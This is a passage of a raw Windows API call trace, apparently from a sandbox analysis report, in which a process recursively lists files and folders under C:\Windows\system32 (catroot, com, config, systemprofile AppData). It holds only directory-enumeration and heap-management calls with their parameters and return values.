cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI884F~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33bc15fc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33bc15fc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa4924d00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5892~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x348ff074, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x348ff074, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x123e7900, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC479~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe4136930, ftCreationTime.dwHighDateTime=0x1cb892a, ftLastAccessTime.dwLowDateTime=0xe4136930, ftLastAccessTime.dwHighDateTime=0x1cb892a, ftLastWriteTime.dwLowDateTime=0x56317e00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIEF23~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1188fe7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1188fe7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x55005100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x39463e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MID8CB~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0030.701] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0030.701] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0030.701] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 85 [0030.701] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 80 [0030.701] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0030.702] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0030.702] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0030.702] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0030.702] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0030.702] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0030.702] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0030.702] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0030.702] lstrlenW (lpString="Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 92 [0030.793] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.793] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d6f8 | out: hHeap=0x6d0000) returned 1 [0030.793] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.793] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c498 | out: hHeap=0x6d0000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70c498 [0030.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\*", lpFindFileData=0x70c498 | out: lpFindFileData=0x70c498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x486905c0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x486905c0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76ceddac, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76ceddac, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76ceddac, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.795] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.795] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d6f8 | out: hHeap=0x6d0000) returned 1 [0030.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84bfae1, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x8851be8, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x8851be8, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.796] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d6f8 | out: hHeap=0x6d0000) returned 1 [0030.796] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c498 | out: hHeap=0x6d0000) returned 1 [0030.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\*", lpFindFileData=0x70eb28 | out: lpFindFileData=0x70eb28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5f9c6, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e470555, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\dmp\\*", lpFindFileData=0x70fe38 | out: lpFindFileData=0x70fe38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xa35dd730, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.800] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.800] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fe38 | out: hHeap=0x6d0000) returned 1 [0030.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\en-US\\*", lpFindFileData=0x70fe38 | out: lpFindFileData=0x70fe38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e470555, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.801] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.801] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fe38 | out: hHeap=0x6d0000) returned 1 [0030.801] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.801] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70eb28 | out: hHeap=0x6d0000) returned 1 [0030.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\*", lpFindFileData=0x70ebe0 | out: lpFindFileData=0x70ebe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xf1e088, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\Journal\\*", lpFindFileData=0x70ee38 | out: lpFindFileData=0x70ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.802] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.802] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ee38 | out: hHeap=0x6d0000) returned 1 [0030.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\RegBack\\*", lpFindFileData=0x70ee38 | out: lpFindFileData=0x70ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.803] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.803] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ee38 | out: hHeap=0x6d0000) returned 1 [0030.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\*", lpFindFileData=0x70ee38 | out: lpFindFileData=0x70ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xef7f2e, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\*", lpFindFileData=0x70f090 | out: lpFindFileData=0x70f090*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x51ab36f5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x51ab36f5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650074, dwReserved1=0x33006d, cFileName=".", cAlternateFileName="")) returned 0x70f2e8 [0030.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\*", lpFindFileData=0x70f328 | out: lpFindFileData=0x70f328*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x2a005c, cFileName=".", cAlternateFileName="")) returned 0x712f00 [0030.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x70f580 | out: lpFindFileData=0x70f580*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70f7d8 [0030.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x70f818 | out: lpFindFileData=0x70f818*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x714f50 [0030.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x70fa70 | out: lpFindFileData=0x70fa70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2829382e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fcc8 [0030.806] FindClose (in: hFindFile=0x70fcc8 | out: hFindFile=0x70fcc8) returned 1 [0030.806] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fa70 | out: hHeap=0x6d0000) returned 1 [0030.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*", lpFindFileData=0x70fa70 | out: lpFindFileData=0x70fa70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fcc8 [0030.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*", lpFindFileData=0x716fa0 | out: lpFindFileData=0x716fa0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.807] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x716fa0 | out: hHeap=0x6d0000) returned 1 [0030.807] FindClose (in: hFindFile=0x70fcc8 | out: hFindFile=0x70fcc8) returned 1 [0030.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fa70 | out: hHeap=0x6d0000) returned 1 [0030.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*", lpFindFileData=0x70fa70 | out: lpFindFileData=0x70fa70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fcc8 [0030.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x716fa0 | out: lpFindFileData=0x716fa0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0PS72R2M\\*", lpFindFileData=0x718200 | out: lpFindFileData=0x718200*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.809] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0030.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\62AXOPQ5\\*", lpFindFileData=0x718200 | out: lpFindFileData=0x718200*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.809] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.813] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0030.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\FZG8CKJ5\\*", lpFindFileData=0x718200 | out: lpFindFileData=0x718200*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.814] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0030.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LIXMVQOA\\*", lpFindFileData=0x718200 | out: lpFindFileData=0x718200*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.815] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0030.815] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x716fa0 | out: hHeap=0x6d0000) returned 1 [0030.815] FindClose (in: hFindFile=0x70fcc8 | out: hFindFile=0x70fcc8) returned 1 [0030.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fa70 | out: hHeap=0x6d0000) returned 1 [0030.816] FindClose (in: hFindFile=0x714f50 | out: hFindFile=0x714f50) returned 1 [0030.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f818 | out: hHeap=0x6d0000) returned 1 [0030.816] FindClose (in: hFindFile=0x70f7d8 | out: hFindFile=0x70f7d8) returned 1 [0030.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f580 | out: hHeap=0x6d0000) returned 1 [0030.816] FindClose (in: hFindFile=0x712f00 | out: hFindFile=0x712f00) returned 1 [0030.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f328 | out: hHeap=0x6d0000) returned 1 [0030.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\*", lpFindFileData=0x70f328 | out: lpFindFileData=0x70f328*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x51ab36f5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x2a005c, cFileName=".", cAlternateFileName="")) returned 0x70f580 [0030.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x70f5c0 | out: lpFindFileData=0x70f5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x70f818 [0030.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x70f858 | out: lpFindFileData=0x70f858*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fab0 [0030.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x70faf0 | out: lpFindFileData=0x70faf0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, 